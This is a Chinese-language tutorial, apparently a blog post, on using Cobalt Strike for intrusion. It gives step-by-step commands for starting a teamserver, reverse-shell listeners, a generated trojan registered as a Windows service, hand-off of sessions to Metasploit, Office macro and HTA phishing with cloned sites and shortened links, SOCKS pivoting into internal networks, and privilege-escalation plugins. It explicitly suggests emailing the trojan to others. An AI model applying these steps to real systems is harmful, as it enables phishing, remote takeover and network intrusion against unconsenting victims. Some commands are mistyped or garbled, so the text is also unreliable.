CobaltStrike是一款美国RedTeam开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,CobaltStrike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。
CobaltStrike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上。当然你知道利用这款工具主要用于内网渗透以及APT攻击。
项目官网:https://www.cobaltstrike.com
实验环境:
服务器端(Linux):192.168.0.109靶机(windows):192.168.19.130
使用cobaltstrike 3.14
实验步骤
将工具上传到kali系统中运行时给777权限
root@kali:/mnt/cobaltstrike# chmod 777
/mnt/cobaltstrike/
一、启动,连接服务器
启动服务端:(test 为待会靶机连接服务器的密码)./teamserver 192.168.19.146 test
Test为密码hash密码要与客户端一样诺不一样则此软件存在后面
客户端连接服务器运行:cobalstrike.bat
启动客户端,输入ip,密码,端口,用户默认
如果客户端 是Linux操作系统则运行以下命令,启动客户端:java -Dfile.encoding=UTF-8
-javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap
-XX:+UseParallelGC -jar cobaltstrike.jar
创建监听器。4.0一、创建监听器
1、点击 Cobalt Strike ->
Listeners->Add,其中内置了八个Payload,
wndows/beacon_dns/reverse_dns_txt
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https
windows/beacon_bind_pipe
windows/beacon_tcp
windows/beacon_extc2
windows/foreign/reverse_http
windows/foreign/reverse_https
生成木马创建payload 让主机上线
运行该exe主机成功上线:可以查看上线主机的磁盘信息,进行端口扫描,查看进程等信息。
同理如果将生成的artifact.exe作为附件发送给其他人,只要有人点击,则他的机器会上线。不过现在的电脑都装了杀毒软件,所以payload需做免杀。这个后续在研发
HttpsPayload应用
优点:可能过行为查杀、另外administrator运行可直接提升为system权限
第一步
Windows Service需要向操作系统注册EXE直接运行
第二步:创建服务
Sc create test binpath= ”c:\test.exe” //创建的服务名,binPath后面是运行exe文件的所在路径 创建一个路径一般放在C:\Windows\System32下因为这个路径执行文件最多
start= auto displayname= ”test” //将exe注册为windows服务 displayname服务器名称
Sc start test //开启这个服务
Sc delete test //删除这个服务
Sc top test //首先使用这个服务
sc配置服务
有以下集中方式:
sc config 服务名 start= AUTO (自动)
sc config 服务名 start= DEMAND (手动)
sc config 服务名 start= DISABLED(禁用)
三、关于SC
可参考一个网友的博文---SC命令管理服务状态:http://blog.csdn.net/ddjj_1980/article/details/7493045
1、结合metasploit,反弹shell
1. MSF中use exploit/multi/handler,然后set payload windows/meterpreter/reverse_tcp、set lhost、set lport;然后CS中新建监听器;一个test社工肉鸡运行,然后新建监听器reverse_tcp派生会话,run:
新建两个监听器一个放木马上线
在靶机中使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。
选中刚刚新建msf
session -i查看会话然后session -i 1进入
派生给reverse_tcp然后Exploit
2、office宏钓鱼
攻击→后门→MS office 然后复制恶意代码→插入office的宏中,社工肉鸡打开即可
MSF中use exploit/multi/handler,然后set payload windows/meterpreter/reverse_tcp、set lhost、set lport;然后CS中新建监听器;一个test社工肉鸡运行,然后新建监听器reverse_tcp派生会话,run:或使用另一个监听器可以直接在图形化界面使用
或使用另一个监听器可以直接在图形化界面使用
下载运行则中招
Cs 生成的代码直接放到创建里面去,注意:做试验的时候,宏的位置不要设置所有的活动模板和文档,建设应用在当前文档,不然本机所有word文档运行都会种上你的木马,另外打开word文档有宏提示,一般是word默认禁用所有宏(文件—选项—信任中心—信任中心设置里面配置)。
3、hta网页挂马
第一步:生成hta
第二步:使用文件下载
点击开始之后,evil.hta文件会自动传到cs uploads目录。
如果之前设置过钓鱼页面,记得一定要删掉,不然会克隆的时候会报错
总结:
1. 先制作HTML:http://192.168.1.184:80/test.hta
2. 钓鱼攻击→文件下载:http://192.168.1.184:80/download/file.ext
3. 钓鱼攻击→克隆网站:http://192.168.1.184:80/
4. 社工肉鸡打开:
键盘记录
4、邮件钓鱼
1. 邮件钓鱼:
附件下载后运行
5. 信息收集
制作好钓鱼页面:可以使用https://bitly.com制作短网址,然后让对方打开:
然后设置好跳转的网址
以通过https://bitly.com生成url短链接 ()
6. socks代理:
win7双网卡:内网:172.16.2.1
win2003:172.16.2.2
win7双网卡
2003内网:172.16.2.1
MSF中:setg Proxies socks4:192.168.1.184:40520;use auxiliary/scanner/smb/smb_version;然后set rhosts 172.16.2.2;run
setg Proxiessocks4:192.168.0.106:6677
也可以使用下面方法:
开启socks4a代理,通过代理进行内网渗透
开启socks,可以通过命令,也可以通过右键Pivoting->SOCKS Server
beacon> socks2222
[+] startedSOCKS4a server on: 2222
[+] host calledhome, sent: 16 bytes
然后vim
/etc/proxychains.conf ,在文件末尾添加socks4代理服务器
使用proxychains代理扫描内网主机 proxychains nmap -sP192.168.183.0/24
小结:
1. CS可以创建多个客户端,操作方便
2. 功能扩展比较多,如:payload可以多种语言。
3. 支持宏的办公软件都可以(office/WPS)
4. 默认宏安全性高/非常安全,运行宏时会提示;中低不会提示,打开world有提示,说明宏很有可能有木马。
cs提权
你以什么权限运行的木马,那么木马将拥有此权限,如果权限过低我们只能进行提权。
提权插件下载https://github.com/rsmudge/Elevatekit
https://github.com/k8gege/Aggressor
选择脚本管理器将下载好的插件放入进去不要有中午目录
内网渗透插件加使用方法
网友评论